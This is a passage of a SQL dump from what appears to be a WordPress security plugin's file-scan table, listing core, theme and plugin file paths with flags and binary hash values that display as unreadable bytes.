��<S.m����t','',0,'?'),('�2�>�[{�Lj�0�s�','wp-content/plugins/wp-cerber/assets/flags/ai.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�]��à�a�{��','*[3#�h���\"M�@]l�Ή05>И��ۖf','',0,'?'),('�:��z�E�OD��v��','wp-content/themes/advance/inc/kirki/assets/js/controls/radio-image.js',0,'}�E뵄ڇE\"k��pi','}�E뵄ڇE\"k��pi','� �2C�Zf��{N�\0~�{hR_ ~~�1���>U','',0,'?'),('�<�3�v��&F','wp-content/plugins/wordfence/views/scanner/scan-failed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"x�;���h�O���','��I}l�|U�j�Pr���7��ڲkV���`��','',0,'?'),('�>��o߷m�ƹj\'oW�','wp-content/themes/wp-barrister/library/images/reply.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4�UM� #��>}���','g�E�A��݃ơ�\'ˋ��\n��4 �:�\r*N�','',0,'?'),('�A?�]\\8�PMT�l','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int32.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C�B�)c��ae���','�[}���D���\0OV�:~-�\"~mBh\"<�pW�','',0,'?'),('�GV\\z��#���!;��','wp-includes/js/media-audiovideo.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f��}�юFǑ+���','���U��#�QC�F����F:,�}��u���KP','',0,'?'),('�M��s�;\',���-E','wp-admin/css/dashboard-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Yk|��v���','*�x)��68NHɎ3 �AhC� \'q~a� I<�','',0,'?'),('�O�r#��T�G��!','wp-includes/js/swfobject.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���,�I}p�e~2�q�','?��Lw���.�4M��ՒF�J�>fI�鴆�','',0,'?'),('�l&�*������&','wp-includes/SimplePie/Content/Type/Sniffer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JVP�t>%N����\0','\n��S/��̼#@��%���,�ul��$t���T��','',0,'?'),('�w�\Z��plUz�Q�','wp-content/plugins/wp-cerber/assets/flags/ly.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�,ʁ���]��r�V','t��\n�jM��l��0�^��f&���`ʃ','',0,'?'),('���$(�g�(���P��/','wp-admin/css/wp-admin-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�Q5\'EY�o�0�}�_�','0�|TF����O �.�����.��>��CEj��','',0,'?'),('��5��At߂�m0i�z�','wp-admin/css/themes-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d��FK�0��\0]0','?����l�̚U�^���t1\0#U|Yh�|�\"\Z','',0,'?'),('����92R]�X~�i�','wp-content/plugins/wp-cerber/assets/flags/bg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[��g��:�uO�c','�{h�s`�W�\\�v���n�OF�\Z�r���J�s','',0,'?'),('���q�K�U�j�','wp-includes/SimplePie/Category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{���[�� �ZVG�4&','�<��J�H�v�i� b�4l~�e�F��mj�','',0,'?'),('��O\n �U��Rb','wp-includes/Requests/Exception/HTTP/304.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;F4�A�I���T�','v��C��� a�\'F�;���z���(eJ��L','',0,'?'),('���&a;��_�Ɩ@','wp-content/themes/weblog/acmethemes/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7q54�BMN���8','00V`ȕ_��/ d\0*��D>�x���L�=mt~N�','',0,'?'),('��-Z���:E�:','wp-admin/js/image-edit.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�M��l~%������','\\�%k�����;�,����ay\\�s�A\'','',0,'?'),('���7����Rr�','wp-content/plugins/redirection/locale/json/redirection-de_DE.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I���E�#8�z��','u�)\n�j��� �������č��f�ӒXت]','',0,'?'),('���|�jX����|�fb','wp-admin/css/login.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qT������b�W�[}','�P\'���)�Y&T��j���A�- \"��2~','',0,'?'),('�!�-�d��u�\r�fu','wp-content/themes/skt-toothy/images/slide-nav.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q\"k��n�\n�w-�q�*','f]e�8�\'����/�n�N�~jY�unAfY�!^��','',0,'?'),('�*i�8��]�\n4����','wp-content/themes/twentynineteen/print.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0)ݴ�`I4�P?Y$2|\n','��$�eI�8a��*�����\0��D��B�0','',0,'?'),('�<t@�zfj����r�h','wp-content/plugins/wp-cerber/assets/flags/ht.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Wѭ�b;��t�','#{�՞p�.3��T���[�Kj�P�x�=','',0,'?'),('�MR��l�B�F�u','wp-includes/option.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]�2�ZB0����','����+�9*$��<��*G�T���:*N�j���','',0,'?'),('�r�\\�j�����A$�','wp-includes/js/customize-base.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Gx�Fy1w��','�s7�-<%���WȒߚC�.��. ��zW','',0,'?'),('�����\"Sέ`t@','wp-admin/network/plugins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R\n��.o���Ʊ2bw','�A�gp����/�m��,&Rq�f9ey��$=�','',0,'?'),('��K?�r��a#Qh','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/InvalidRequestException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ia����Rɞ%x��','���M�� �b����d�]F�i�POZq��','',0,'?'),('�� C�-�u��\Znb�','wp-content/themes/advance/inc/kirki/includes/output/field/class-kirki-output-field-typography.php',0,')����D�F^�0\r�',')����D�F^�0\r�','�\Z�d�6��f\0��Iz���(�|���','',0,'?'),('���\\��.1��-��:','wp-admin/options-media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\�[x�N�:���dw#\\','�R�/Q�O�l��@���c�0�\0a`n�o��<','',0,'?'),('��ΝH�*��*.ځS','wp-admin/includes/bookmark.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M\0��V�r�K���','��=�)g��E�S�Y�[p�t%�Q���\"�','',0,'?'),('��dx���eB�ݙϟ5','wp-includes/IXR/class-IXR-clientmulticall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H���q�g��l�t','��ғ\'bO����E�&ƧW0h� o�\\`��Y��','',0,'?'),('�ɔ/� yT�5:Dh�','wp-content/plugins/wp-cerber/assets/flags/mn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�{�)YJ����','/ҹ��;9��������\0d�֑�]�>','',0,'?'),('�ўA��2k�����\\��','wp-content/themes/weblog/acmethemes/hooks/excerpts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��;�Q�XZf��h�M','\'��M8(�#ꌒ,�I�� �yj|�R����9�','',0,'?'),('���z��Bp��Br�','wp-content/themes/skt-toothy/editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','` CÊ�A@����`�','�\'�\\�o4���o�|4I,@ J�O����Ћ�','',0,'?'),('��Ul1�ȕD�bmg�','wp-includes/css/buttons-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F��X�WDw����ڭ�','�o� ������!Pc�����\0�i�F9aK����','',0,'?'),('���Ϗ��RCOh����','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/InvalidDatabaseException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0��6��.tz��x�o','��;���p^\0��3�Թ�(� ��A���a���w','',0,'?'),('�\nfv�8���1���-I','wp-includes/SimplePie/Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','逗z�qŔ��/��','_pe�NO�/�*�mv��ȿ�n6*��zo��n�','',0,'?'),('���U�N,� \\1','wp-content/themes/twentynineteen/sass/forms/_forms.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%��n����ŋA�','h��VC{�B�{���4O�b�]=��;X)��(X�','',0,'?'),('�F�[��㵋Pѳ�@�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Postal.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�b�P\"��x�Y@0��','�\'���n��*2nԋ����)�a(�_�Iq�ɘ{','',0,'?'),('�O�\0�Q,�N 4$�N��','wp-content/plugins/redirection/redirection-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��鄉D�C` ��5','��I?g�y�HaQ^[%�g�!U�K�#�MO%XB','',0,'?'),('�`�`\'�l`=��X(','wp-content/plugins/wordfence/views/options/option-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����?�@s�ó','aqq�������@.�7T�o=6�\0<��CZ','',0,'?'),('�xO��ri�x3b��q','wp-content/themes/healthcare/css/customizr.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�BXy}�ep�g�3�s�',':Π/kV��>7�z���*W$1���\r�>&�ڏj','',0,'?'),('�y��ё�c�j!�\\\'','wp-includes/class-wp-block-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.�״�8��9��','�$-���R̒�~�����N�j��]?=��&','',0,'?'),('�2�D[\"��*\"(��','wp-includes/js/jquery/ui/effect-size.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a;l�@��r%�ݢZ','���cQ>�WYe\Zw\"���`�M�rј^','',0,'?'),('��hJ��D�㰗G� �n','wp-content/plugins/wordfence/lib/wfCentralAPI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','耳��B/�X�\n`�2r','��>C��]�!��կVMՍ�4U��U����\Z','',0,'?'),('���ZQ4��\\(�܇','wp-admin/network/admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ϯ\r��&Z3�r�\"�','�:��%�;Ki�W@>�U;������#�>','',0,'?'),('���\Z�1|��S}>�','wp-content/plugins/redirection/models/database.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����vwiǘ���f','n#�A��R��C&� �H�\r�����; �$','',0,'?'),('��H9�:A�q�ӻ8��','wp-content/themes/healthcare/images/Enigma.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����l�Ü���',' �6�n~F�0u� -,���O-]d�*]�=Mw]','',0,'?'),('��[0��^������','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/AnonymousIp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�mg�ݜ|�<뼸Dh','�+��%�G�<t�1]�I�5m�\Z�}��E�>�;','',0,'?'),('��H�\'#�!��N�w�','wp-content/themes/wp-barrister/content-single-people.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������t[���K��','˽�ے?�4���L��t�XΩ�Re�a','',0,'?'),('��Ƞ\">�gݠ���','wp-content/themes/twentytwentyone/assets/css/custom-color-overrides.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O�*�;��8I�w�\ZA�','�st4�ݎ%�o�@L��I�ߟ�u�\Z�\\o�8�D','',0,'?'),('��/�؊!�N>�\n�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��f<_2S^I��Z','��iݯ��8{��i���q!d���Ս��Az�','',0,'?'),('�\'}j��=A>\r���9','wp-content/plugins/wp-cerber/assets/flags/vi.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�.f���&� S��j','����)Am{���M�D�&��ʑaG\rmM�f','',0,'?'),('�!�VTg�\"O\r�.�2L','wp-content/plugins/wp-cerber/assets/flags/pn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����E~&X��l�x','g���\'G��5�ɒ<�tȺyol���|U�ӫ','',0,'?'),('�\Z���l���3Ȋ�','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�UՒ�JL��m8`v','ӛ�vQ��k��\n��l�]�`Ε��۷�+}�kO�','',0,'?'),('�J|6}�P�,\rٛ','wp-admin/css/colors/_admin.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R)���8 <�67�#\Z�','��]>y-�f�\"�Ny%\r�l��r`������','',0,'?'),('�Z�@����E�ya�B','wp-content/themes/twentynineteen/sass/typography/_headings.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|R��s�x���*%�','�pЎ��(�W�\\��� �c�36�\0��\'�f�','',0,'?'),('�\\O�hq��2���.�','wp-content/plugins/wp-cerber/assets/admin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J��`���.��/','���>6Q�n��7���2�Sۈ܊�� �','',0,'?'),('�d`#)?�ϳ��0(w��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �oY���-�)EHd','l�,8�E�T��C�eyl�a�S��;)\'\"d�`z��','',0,'?'),('��x�`�f,5ef2��','wp-admin/js/site-health.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T%��dx�P7��/�','����{���]�[mX1!u������n�2f�','',0,'?'),('�����[��:�����q','wp-admin/includes/class-wp-plugins-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]5�g��-M���','��?`:3bO���Y�.��*��/��u��Pb_�','',0,'?'),('�������\0+��A�.\\','wp-content/plugins/wp-cerber/assets/flags/qa.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z���%4o�m)�|$I','F��{tT��$(��lVq�5��O�*g','',0,'?'),('���P�Of;���/��','wp-includes/SimplePie/Decode/HTML/Entities.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��jыp&y������U','��WP��*P=Nϻ;\Z���i��8��2�_��� ','',0,'?'),('��.yz�_��jz�|�','wp-content/themes/twentynineteen/images/pattern_03.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e�Y)f�x��:.+��','4]ou�\'�u�����mN��ZV;Ke��jW>T','',0,'?'),('������dN����h�,','wp-content/plugins/redirection/models/monitor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>j=3�y�q�G�\"/','��q����C�t������.�·��JΩ��','',0,'?'),('��ӑ�?���=�','wp-includes/block-patterns/heading-paragraph.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����?z�I�����E','�i�,��m�O���#�?Vb�,�C-ܢcž\Zh�','',0,'?'),('��Z��(���|��Z','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QU�p~ocÊ4�Nt��','�L��n�l2@ΐ�>h�i,uJY�H��\\�L�,�B','',0,'?'),('�┬�E��+,����','wp-content/plugins/wp-cerber/jetflow.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U���5����� ��g','�\'e^Ƈ/�G�Ow��=|��_(ӋgW���A','',0,'?'),('��\\ ��Iѻ���,','wp-includes/class-simplepie.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(��\\��Jġ�љ�','�8l�n-� �o�=��8,;h�\'LFR#�ʜB','',0,'?'),('���\\�]^�T�ꥊ�','wp-includes/js/dist/vendor/wp-polyfill-url.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rt\0X��d�xR`��','��b�ՔW�?��gtRċ\\}�D�E�TӇ��=','',0,'?'),('�$=Z��Z�Hɼ���f','wp-content/themes/twentytwentyone/assets/sass/06-components/navigation.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������;Y�lE�','�_��E>���@��[)�$�=�A�L� C�Mp�','',0,'?'),('�$lv��EC۩bN','wp-content/themes/twentytwenty/template-parts/footer-menus-widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WC��B����I�mU','���z�jy�I���`F�����.\rCC!qc_','',0,'?'),('�/&����2�ѡ\rgDs','wp-includes/http.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-��X㑩��/��2','? *�~HxJF�z����h�mp�ǖ}����','',0,'?'),('�5قaܨϘ� #��bu','wp-includes/js/dist/compose.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i\0 ��Q�a�5���?','��z~�Յ\0>�����n�ۣ�3\Z؉:C�\Z�','',0,'?'),('�?q�Hl��(�2�m','wp-content/plugins/wp-cerber/assets/flags/pg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���;[����*��','��9O#���x�_���v ��~�%W\Z���','',0,'?'),('�b�E��3�g\'cZ (��','wp-content/plugins/akismet/views/get.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ӵ��q��\'7��\0�Y>�','���x����[�%�����@��c����','',0,'?'),('�c)iI��&��rn�','wp-content/themes/regina-lite/inc/libraries/welcome-screen/class-regina-welcome-screen.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','th߸���>�J�<�','e1~�/��M� �n���]iK�@��Z','',0,'?'),('�����r��~��\Z','wp-content/plugins/wp-cerber/assets/flags/ws.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2���Mr�Z�Yܑz�r','$�!�9��d9��8E�\".0�����J��K`','',0,'?'),('����=��Ѷ�8$�','wp-includes/js/dist/vendor/wp-polyfill-node-contains.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���w��%[U��3�','Et������z��fD:x?���o��c�ڋ 8P','',0,'?'),('��?�0|��5uơ��','wp-admin/custom-background.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','㽫��]0�m7��d','Z�5\"=�\0�T�σqr�/0��Q�X^dn6','',0,'?'),('��w��B��c��u','wp-content/themes/healing-touch/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��G��Y�@|�D��','|,G9n�)��a=�%Aڳ�Z���Թ���','',0,'?'),('���qh�n�J�j�','wp-admin/css/nav-menus.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�۶8��BZ�y��-',']�~*%6�r�+�q�.a�V�s!���Ysk����','',0,'?'),('���<� �f%�n�O�','wp-admin/includes/credits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';b�`u����h\'���y','��Z�C��#�9�8H����<��h�,d��2','',0,'?'),('�ÏuL�,�&Ǒ�\r1','wp-admin/media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;�6���U��3','�D�K���3�́uB!@oP��b��#���~','',0,'?'),('�Ӏ9[�M-g��','wp-includes/js/dist/hooks.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'����ʣJ1�iz��','*��F;���1Y#����W��ˈ���o���','',0,'?'),('��%I���}�P�zW��','wp-includes/random_compat/random_bytes_mcrypt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��T�Ԧʙ`�P��L','�b=�-.���X�����T���Yn���P��','',0,'?'),('��+M�%��]�sD00�','wp-includes/blocks/freeform/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�oU���ޘx)���\Z�','��Ee��d�._=���r�hQ�]!�+�M<�8','',0,'?'),('�\n��n�=�^�n�N','wp-content/themes/twentytwenty/classes/class-twentytwenty-separator-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:L��?�m&�','8uv��ߜ����_�0-��锴U�2','',0,'?'),('�(dwI\0:\r��Xx1DC','wp-content/plugins/wordfence/views/scanner/issue-control-hide-file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'��r�`3�U�$�n��','���B:���BA��xd]��Y�<#�p��8u','',0,'?'),('�,3.0m�ʖ��K,T','wp-content/plugins/redirection/locale/redirection-es_ES.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')b�>k�_L��$J�','K�b��p��u�?8m�G�ݚǖ��ӷK��J�','',0,'?'),('�.���թE��ua��','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/previewer/components/typography.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�4p�8�J]9�[�<','�bK���wz\\[e�O�=�4Nyc~�����|�/D','',0,'?'),('�3�,���cv�k���','wp-content/plugins/wordfence/views/onboarding/overlay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��iŮ�9�e`��2�','Z���M�GXL;$xMi|Q�%���ŽY2��$_','',0,'?'),('�WM��{h���(��','wp-content/plugins/wordfence/lib/menu_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�����e�ډT�a��','\nS��x�B�[��)ɩL�6ۖ>���Hϫܥ��','',0,'?'),('�a�@o��\'��kb��','wp-includes/js/jquery/jquery-migrate.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y��k~�x�$K^-3�}','��P�y���D\\\\�cd�~��P���`7 �F/','',0,'?'),('�t��G�F����9g��','wp-content/themes/doctors/core/contents/loop_search/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e��\Z�r���H�nNB@','h�\\lѯ������.>���^\0� ���','',0,'?'),('�|��t���\r����','wp-content/plugins/redirection/locale/redirection-sv_SE.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f��N+v��f��<-','L���͞{�A^�M�g��ҳFz�t�<[�6$�','',0,'?'),('��i/�pEt�\n�l�','wp-content/plugins/wordfence/lib/rest-api/wfRESTScanController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��r���0mb74$','�{h��D��X�^�w���6D�fc�@Q��\r�f','',0,'?'),('����2��?!�u�܆\"','wp-content/plugins/wordfence/modules/login-security/views/options/option-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[(AɊ�����h�','����ͳߘ�Q6̨!*���X�x��MM�u@','',0,'?'),('���Kr0V#Z�x&�`�','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-textarea.php',0,'�Z��l~O)1��<�(','�Z��l~O)1��<�(','�[ɇ� �\0[+K��rJ�]��O�r1qM�\"�','',0,'?'),('����^[X��i� �','wp-admin/themes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F���-G;:y^\Z)�','����F�ȳ۬�2U����-��:�1��','',0,'?'),('��:�X��@\0{*�֯�','wp-admin/includes/class-language-pack-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w��H�� lO J\rN','�m���%�n\r��؛��qi���m���V&W','',0,'?'),('��4T�(�\\9\'��3�)','wp-admin/css/customize-widgets-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e�{����` .�','����=FL�e���c���^&��\Z|\nl��aO�','',0,'?'),('���\0n:T�q}K �@','wp-includes/Requests/Exception/HTTP/408.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@>1d�IX�O��ȷv�','�q���*�lmKңk�\"�M�Q?�p���a�4','',0,'?'),('��k{��&��x\n��','wp-includes/class-wp-error.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l� &�0?&�c~��','G�bM[G&Jr�F�E����1�r�s�L,t�(�W','',0,'?'),('�ړh �y\Z{_\r+!�','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/wp-customize-extenders/controls/color-picker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F��S&\r���goM�2B','�2�;{�;%���1���E�;�I@�ā��','',0,'?'),('��$�o��1�T�2]l','wp-content/plugins/wordfence/lib/dashboard/widget_countries.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�zTc�I��J��W3','�zU)��i��YQ�;�PXꘞL�v�������','',0,'?'),('���A0f��f`� Kǁ}','wp-content/plugins/wordfence/lib/wfDirectoryIterator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n+Z/_��\Zxu��v','��u���;IV��a[�~㵭�TZ\\^�yJ��j','',0,'?'),('�\0��%3[$x\0��.��(','wp-admin/images/marker.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�*O2/�3I2���','~T�@\\��vUI<�pK����a`T�@c��ca�','',0,'?'),('���[�Q�)}j�I9�','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/css/scss/controls/field-repeater.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?z���v�#��E','�y�ؚVupLMl�fɺ�TY���7�`HB�','',0,'?'),('���4�����=��','wp-content/plugins/wordfence/images/icons/ajaxScan.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ʖ�Ѵ��~f���i�','�ߩ0�ԍ���Ѧ�ƻH\n�����¡;�','',0,'?'),('� ���Em[�����l�<','wp-includes/js/tinymce/plugins/image/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-��ZC�l}�莐�','y��T��Nz+������\'��%Y�','',0,'?'),('�x�e�mk���I�Q5�','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/previewer/components/section-editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��.u��<\"��ٙ���','���r�iw{S�����?�c�21� \"�»','',0,'?'),('�5��B����Q�̑','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/classes/class-epsilon-content-backup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�1y�Ta+�w��#O','Ez��w�F�6.Y��W|݈�!�����','',0,'?'),('�D`B�ȥ�\n�b�Ǚ','wp-content/themes/twentynineteen/sass/_normalize.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����Ut _��vO0a','LL�Z�m��h2-s��,+�<�s!@tp�z�G','',0,'?'),('�MQ��HY�_r$K�S�','wp-content/themes/twentytwenty/assets/js/customize-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x�8\\O��^����QR','����@8\Z���!��G�6��ͮe���,\0�5','',0,'?'),('�o͑��4\\RX���r','wp-content/plugins/all-in-one-wp-security-and-firewall/logs/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��8����I�y{��8�','�O��t-�qu�b���O���%�\r?�3�80��','',0,'?'),('��%*����|0����','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-date-control.php',0,'ݫ$�\r:��](2\\X~W','ݫ$�\r:��](2\\X~W','ч�n���s��Mӥ�&@KC���/6���zEd�','',0,'?'),('���2�+�oin<fN','wp-content/themes/regina-lite/template-parts/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��W�FOig�I','�\\�֖�@pE:�!1#zX�Ry%i\'�F����','',0,'?'),('��\0��]��B���Kdb','wp-content/themes/healthcare/css/font-awesome/HELP-US-OUT.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��X�����y�e(>','|�\\��l��V�E2G-���-[��*���d�n','',0,'?'),('�����kzOv�V \'�','wp-content/themes/healthcare/css/animate.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':^˾�=�X�{2б','~��RhL7�\00���DVi��ג`1R�R/�at','',0,'?'),('��{�]\\ֵ� ��d��','wp-admin/css/forms-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ՒMwG��2�x͝','ݗ��|\0�[����1��1n|�m�©�O� ','',0,'?'),('�ܵCm������c��','wp-content/themes/doctors/core/contents/loop_attachment/loop_attachment/index.php',0,'��F�G��)��A0��0','��F�G��)��A0��0','��*�і��2�n���I���br����','',0,'?'),('�������\"�R�Ŝ','wp-includes/images/crystal/text.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� Ѳ��#�d�%�[�','n1��0��<;�\n��Ip��~�f���⠸��z','',0,'?'),('�%�?������w,�','wp-content/themes/advance/inc/kirki/includes/class-kirki-config.php',0,'��^�8����G','��^�8����G','-�1\"����Cg��>��O �}�q�ŭ�?���','',0,'?'),('�%��+~���R1��҉','wp-content/plugins/all-in-one-wp-security-and-firewall/js/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� 